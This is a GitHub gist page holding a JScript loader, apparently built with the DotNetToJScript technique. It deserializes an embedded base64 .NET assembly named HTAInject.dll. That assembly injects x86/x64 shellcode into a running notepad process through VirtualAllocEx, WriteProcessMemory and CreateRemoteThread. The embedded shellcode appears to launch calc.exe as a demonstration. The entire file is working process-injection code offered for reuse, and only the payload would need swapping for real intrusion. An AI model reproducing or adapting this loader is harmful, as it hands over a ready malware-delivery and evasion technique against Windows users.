Created
March 17, 2023 02:29
-
-
Save manilz/35d001e0e7064fc6fe5ee0d45b8b84a6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(){ | |
| function setversion() { | |
| new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
| } | |
| function debug(s) {} | |
| function base64ToStream(b) { | |
| var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
| var length = enc.GetByteCount_2(b); | |
| var ba = enc.GetBytes_4(b); | |
| var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); | |
| ba = transform.TransformFinalBlock(ba, 0, length); | |
| var ms = new ActiveXObject("System.IO.MemoryStream"); | |
| ms.Write(ba, 0, (length / 4) * 3); | |
| ms.Position = 0; | |
| return ms; | |
| } | |
| var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ | |
| "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ | |
| "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ | |
| "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ | |
| "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ | |
| "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ | |
| "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ | |
| "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ | |
| "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ | |
| "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ | |
| "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ | |
| "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ | |
| "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ | |
| "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ | |
| "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ | |
| "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ | |
| "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ | |
| "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ | |
| "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ | |
| "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ | |
| "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ | |
| "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ | |
| "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMASGGxWgAAAAAA"+ | |
| "AAAA4AACIQsBCwAACgAAAAYAAAAAAAAeKQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ | |
| "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAzCgA"+ | |
| "AE8AAAAAQAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ | |
| "AAAALnRleHQAAAAkCQAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABA"+ | |
| "AAAABAAAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAQAAAAAAAAAAAA"+ | |
| "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAASAAAAAIABQD8IAAA0AcAAAEAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBAAACgAA"+ | |
| "ACoAEzAHAJIAAAABAAARACgGAAAKGv4BFv4BEwcRBy0GAAMKACsEAAQKAAYoBwAACgsFKAgAAAoW"+ | |
| "mgwIbwkAAAooCgAACgAgOgQAABYIbwkAAAooAgAABg0JfgsAAAoHjmkgADAAAB9AKAUAAAYTBAkR"+ | |
| "BAcHjmkSBSgGAAAGJgl+CwAAChYRBH4LAAAKFn4LAAAKKAcAAAYmFhMGKwARBioAAEJTSkIBAAEA"+ | |
| "AAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAOgCAAAjfgAAVAMAAIwDAAAjU3RyaW5ncwAAAADg"+ | |
| "BgAACAAAACNVUwDoBgAAEAAAACNHVUlEAAAA+AYAANgAAAAjQmxvYgAAAAAAAAACAAABVx0CFAkA"+ | |
| "AAAA+iUzABYAAAEAAAAJAAAAAgAAAAkAAAAIAAAAGgAAAAsAAAAJAAAAAgAAAAEAAAACAAAABgAA"+ | |
| "AAEAAAACAAAAAAAKAAEAAAAAAAYAMgArAAYAGgL7AQYApAKEAgYAxAKEAgYA7AL7AQYAFQMrAAYA"+ | |
| "JQMrAAoAUQM+AwYAcwMrAAAAAAABAAAAAAABAAEAAQAQABgAAAAFAAEAAQBRgDkACgBRgE8ACgBR"+ | |
| "gGkACgBRgH4ACgBRgI8ACgBRgJ8AJgBRgKoAJgBRgLYAJgBRgMUAJgBQIAAAAACGGNwAPQABAAAA"+ | |
| "AACAAJYg4gBBAAEAAAAAAIAAliDuAEgABAAAAAAAgACRIP4ATQAFAAAAAACAAJEgDQFTAAcAAAAA"+ | |
| "AIAAkSAcAVwADAAAAAAAgACRIC8BZwARAFwgAAAAAIYAQgFyABgAAAABAEkBAAACAFkBAAADAGgB"+ | |
| "AAABAHQBAAABAIEBAAACAIkBAAABAJIBAAACAJsBAAADAKUBAAAEAKwBAAAFAL0BAAABAJIBAAAC"+ | |
| "AMcBAAADANUBAAAEAN4BAgAFAOQBAAABAJIBAAACACcCAAADADoCAAAEAEYCAAAFAFUCAAAGAGEC"+ | |
| "AAAHAHECAAABAHwCAAACAIACAAADAIkBEQDcAD0AGQDcAHkAIQDcAD0ACQDcAD0AKQDcAH4AMQAc"+ | |
| "A4MAOQAtA4cAQQBZA40AQQBsA5QASQB7A5gAMQCFA50ACAAEAA0ACAAIABIACAAMABcACAAQABwA"+ | |
| "CAAUACEACQAYACkACQAcAC4ACQAgADMACQAkADgALgATAK0ALgAbALYAoAD/AgwDAAEFAOIAAQAG"+ | |
| "AQcA7gABAEMBCQD+AAIAQQELAA0BAQBAAQ0AHAEBAAABDwAvAQEABIAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "4gIAAAQAAAAAAAAAAAAAAAEAIgAAAAAABAAAAAAAAAAAAAAAAQArAAAAAAAAAAA8TW9kdWxlPgBI"+ | |
| "VEFJbmplY3QuZGxsAFRlc3RDbGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AFBST0NFU1NfQ1JF"+ | |
| "QVRFX1RIUkVBRABQUk9DRVNTX1FVRVJZX0lORk9STUFUSU9OAFBST0NFU1NfVk1fT1BFUkFUSU9O"+ | |
| "AFBST0NFU1NfVk1fV1JJVEUAUFJPQ0VTU19WTV9SRUFEAE1FTV9DT01NSVQATUVNX1JFU0VSVkUA"+ | |
| "UEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQAuY3RvcgBPcGVuUHJvY2VzcwBH"+ | |
| "ZXRNb2R1bGVIYW5kbGUAR2V0UHJvY0FkZHJlc3MAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNz"+ | |
| "TWVtb3J5AENyZWF0ZVJlbW90ZVRocmVhZABJbmplY3QAZHdEZXNpcmVkQWNjZXNzAGJJbmhlcml0"+ | |
| "SGFuZGxlAGR3UHJvY2Vzc0lkAGxwTW9kdWxlTmFtZQBoTW9kdWxlAHByb2NOYW1lAGhQcm9jZXNz"+ | |
| "AGxwQWRkcmVzcwBkd1NpemUAZmxBbGxvY2F0aW9uVHlwZQBmbFByb3RlY3QAbHBCYXNlQWRkcmVz"+ | |
| "cwBscEJ1ZmZlcgBuU2l6ZQBscE51bWJlck9mQnl0ZXNXcml0dGVuAFN5c3RlbS5SdW50aW1lLklu"+ | |
| "dGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXpl"+ | |
| "AGxwU3RhcnRBZGRyZXNzAGxwUGFyYW1ldGVyAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAHg4"+ | |
| "NgB4NjQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRp"+ | |
| "b25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEhUQUluamVjdABEbGxJ"+ | |
| "bXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAGtlcm5lbDMyAEludFB0cgBnZXRfU2l6ZQBDb252"+ | |
| "ZXJ0AEZyb21CYXNlNjRTdHJpbmcAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAR2V0UHJvY2Vz"+ | |
| "c2VzQnlOYW1lAGdldF9JZABDb25zb2xlAFdyaXRlTGluZQBaZXJvAAAAAAMgAAAAAACYOUOmVZX0"+ | |
| "Tr1fZSUxEnD/AAi3elxWGTTgiQIGCAQCAAAABAAEAAAECAAAAAQgAAAABBAAAAACBgkEABAAAAQA"+ | |
| "IAAABAQAAAAEQAAAAAMgAAEGAAMYCAIIBAABGA4FAAIYGA4IAAUYGBgJCQkKAAUCGBgdBQkQGQoA"+ | |
| "BxgYGAkYGAkYBiADCA4ODgQgAQEIBCABAQ4DAAAIBQABHQUOBgABHRIhDgMgAAgEAAEBCAIGGAwH"+ | |
| "CA4dBRIhGBgZCAIIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAA9CgA"+ | |
| "AAAAAAAAAAAADikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAAAAAAAAAAX0NvckRs"+ | |
| "bE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAA"+ | |
| "AAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAA"+ | |
| "VgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A"+ | |
| "AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBn"+ | |
| "AEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUA"+ | |
| "RABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBu"+ | |
| "AAAAAAAwAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAFQA"+ | |
| "QQBJAG4AagBlAGMAdAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0"+ | |
| "AAAAIAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAFQAQQBJAG4A"+ | |
| "agBlAGMAdAAuAGQAbABsAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAu"+ | |
| "ADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4A"+ | |
| "MAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAgOQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+ | |
| "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; | |
| var entry_class = 'TestClass'; | |
| try { | |
| setversion(); | |
| var stm = base64ToStream(serialized_obj); | |
| var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); | |
| var al = new ActiveXObject('System.Collections.ArrayList'); | |
| var d = fmt.Deserialize_2(stm); | |
| al.Add(undefined); | |
| var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); | |
| var x64 = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"; | |
| var x86 = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA=="; | |
| var ret = o.Inject(x86, x64, 'notepad'); | |
| } catch (e) { | |
| debug(e.message); | |
| } | |
| })(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment